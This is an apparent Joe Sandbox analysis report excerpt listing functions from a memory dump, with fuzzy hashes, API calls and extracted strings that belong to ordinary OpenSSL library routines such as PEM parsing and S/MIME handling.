Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
Instruction ID: 4b54806052ff6cef4f12e3f55ff26d6aa71be9add3cba16a1122a52c07ef6b19
Opcode Fuzzy Hash: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
Instruction Fuzzy Hash: D7F0B4313682A509C759CE367848F5D6ED19791BC9F12C0309A4CC3F54E92EC5018B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE572C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
Instruction ID: f7d2f73c8d0cd081c4c05fc2f26f3e3d37724f92d0b6c85429900b3eac4eea3b
Opcode Fuzzy Hash: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
Instruction Fuzzy Hash: ABE0DF727583A809C79ACE332918E6DAAA1A314BC6F43C0309A0DC3F41FD2EC601CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FD93EC0 Relevance: 49.7, APIs: 19, Strings: 14, Instructions: 223
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F11
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F28
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F3F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F72
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FBB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FEF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94041
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94054
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9406B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9407E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94095
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940A8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940BF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940D2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940E5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9410B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94157
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94182

Strings

ANY PRIVATE KEY, xrefs: 00007FFD3FD93F07
PKCS7, xrefs: 00007FFD3FD94112
CERTIFICATE REQUEST, xrefs: 00007FFD3FD9409E
PRIVATE KEY, xrefs: 00007FFD3FD93F35, 00007FFD3FD93F64
CERTIFICATE, xrefs: 00007FFD3FD94074, 00007FFD3FD940B5, 00007FFD3FD94101, 00007FFD3FD94178
X9.42 DH PARAMETERS, xrefs: 00007FFD3FD94037
X509 CERTIFICATE, xrefs: 00007FFD3FD94061, 00007FFD3FD940DB
ENCRYPTED PRIVATE KEY, xrefs: 00007FFD3FD93F1E
DH PARAMETERS, xrefs: 00007FFD3FD9404A
PKCS #7 SIGNED DATA, xrefs: 00007FFD3FD9414D
NEW CERTIFICATE REQUEST, xrefs: 00007FFD3FD9408B
PARAMETERS, xrefs: 00007FFD3FD93FB1, 00007FFD3FD93FE1
CMS, xrefs: 00007FFD3FD94187
TRUSTED CERTIFICATE, xrefs: 00007FFD3FD940C8, 00007FFD3FD940EE

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
API String ID: 1004003707-1119032718
Opcode ID: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
Instruction ID: 125f5343d34db9bb31217c7e4bd847cf9c14f235e86eabb713160d7f0ee185b6
Opcode Fuzzy Hash: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
Instruction Fuzzy Hash: 9391E312F0C64F40FE5C9765A53437A1790AFA67D4F449232DF4E936C6EE2DE449A380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1B77 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9314A
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9318A
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931AE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931C7
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931E3
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931FC

Strings

Proc-Type:, xrefs: 00007FFD3FD93143
DEK-Info:, xrefs: 00007FFD3FD93237
..\s\crypto\pem\pem_lib.c, xrefs: 00007FFD3FD93164, 00007FFD3FD93217, 00007FFD3FD93259, 00007FFD3FD932CE, 00007FFD3FD93316, 00007FFD3FD93344, 00007FFD3FD933F9
,, xrefs: 00007FFD3FD9328A
, xrefs: 00007FFD3FD931F2
, xrefs: 00007FFD3FD931D9
ENCRYPTED, xrefs: 00007FFD3FD931BA

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strspn$strncmp
String ID: $ $ ,$..\s\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
API String ID: 1384302209-3505811795
Opcode ID: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
Instruction ID: bcccf6dc8313dd3520a6f3af1aa437c73151b15f240eed1d7ffef2922d6de6e8
Opcode Fuzzy Hash: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
Instruction Fuzzy Hash: 9791DFA1B0C64B92F7289F61E82427B3761AF40784F444035DB8E43A96EF3DF54AE780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4E3F Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 205
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FFD3FCEDE64
GetFileType.KERNEL32 ref: 00007FFD3FCEDE75
__stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FCEDEB1
WriteFile.KERNEL32 ref: 00007FFD3FCEDED9
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FCEDF46
__stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FCEE0D5
RegisterEventSourceW.ADVAPI32 ref: 00007FFD3FCEE0F4
ReportEventW.ADVAPI32 ref: 00007FFD3FCEE136
DeregisterEventSource.ADVAPI32 ref: 00007FFD3FCEE13F

Strings

, xrefs: 00007FFD3FCEDF60
OpenSSL, xrefs: 00007FFD3FCEE0ED
no stack?, xrefs: 00007FFD3FCEDF2C
OpenSSL: FATAL, xrefs: 00007FFD3FCEE14D

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite__stdio_common_vsprintf__stdio_common_vswprintf
String ID: $OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 2603057392-2963566556
Opcode ID: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
Instruction ID: 973bf5ad7e953ddbd526bd5995371ed29bbe530dc455b4082567d2bc521dbc7f
Opcode Fuzzy Hash: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
Instruction Fuzzy Hash: CF91D172B08B8A96EB248F24E8641AD7760FB55B95F444336EB5D07B95EF3CE284D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1C1C Relevance: 21.3, APIs: 5, Strings: 9, Instructions: 267
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91B73
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91C9C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91CAF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91E4C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91E5F

Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A33
Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A4B
Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A68

Strings

application/pkcs7-mime, xrefs: 00007FFD3FC91E55
content-type, xrefs: 00007FFD3FC91B24
application/pkcs7-signature, xrefs: 00007FFD3FC91CA5
..\s\crypto\asn1\asn_mime.c, xrefs: 00007FFD3FC91AEB, 00007FFD3FC91C2D, 00007FFD3FC91CC5, 00007FFD3FC91D41, 00007FFD3FC91DC5, 00007FFD3FC91DF7, 00007FFD3FC91E75, 00007FFD3FC91EFC
boundary, xrefs: 00007FFD3FC91B84
type: , xrefs: 00007FFD3FC91CDE, 00007FFD3FC91E8E
application/x-pkcs7-signature, xrefs: 00007FFD3FC91C92
multipart/signed, xrefs: 00007FFD3FC91B69
application/x-pkcs7-mime, xrefs: 00007FFD3FC91E42

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp$strncmp
String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
API String ID: 1244041713-3630080479
Opcode ID: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
Instruction ID: 6fced7b3fcb30033d622327943790b28dcc64e51c9e48515a846d5ccae3f02e9
Opcode Fuzzy Hash: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
Instruction Fuzzy Hash: 98C1BFA1B4C64E81FA2CEB21B4A16BE6351AF85784F585032DB4D0778ADF3DE644F312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1F69 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

..\s\crypto\rand\randfile.c, xrefs: 00007FFD3FDADF72, 00007FFD3FDADFD1, 00007FFD3FDAE0DC
i, xrefs: 00007FFD3FDADFC9
Filename=, xrefs: 00007FFD3FDADF93, 00007FFD3FDADFE7, 00007FFD3FDAE0FD

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\rand\randfile.c$Filename=$i
API String ID: 0-1799673945
Opcode ID: f7537f73f6dcab363935f305fb77117b11e50ba5bbe0b7dda00e0b6990df72fa
Instruction ID: bfdcc154eca4f47c8d264458fce8f95c1700be663659dff3f50eba1c132b2bbf
Opcode Fuzzy Hash: f7537f73f6dcab363935f305fb77117b11e50ba5bbe0b7dda00e0b6990df72fa
Instruction Fuzzy Hash: 0251D662B0C64A92FA68DB22E8646BA2391EF80B80F440235DB1D47795EF3DE505E745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE32AB Relevance: 16.6, APIs: 5, Strings: 6, Instructions: 127stringCOMMON

Download Yara Rule

APIs

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FDDAB2C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDDAB41
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FDDAB53

Strings

accuracy, xrefs: 00007FFD3FDDAA63, 00007FFD3FDDAAB3, 00007FFD3FDDAC04
..\s\crypto\ts\ts_conf.c, xrefs: 00007FFD3FDDAAA0, 00007FFD3FDDABEC
secs, xrefs: 00007FFD3FDDAAFD
p, xrefs: 00007FFD3FDDABE4
microsecs, xrefs: 00007FFD3FDDAB5E
millisecs, xrefs: 00007FFD3FDDAB37

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: atoi$strcmp
String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
API String ID: 4175852868-1596076588
Opcode ID: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
Instruction ID: f917f945bc20aa59fcc6265a7c8640483ad87cfc2c4200ec2473eea38a5962bc
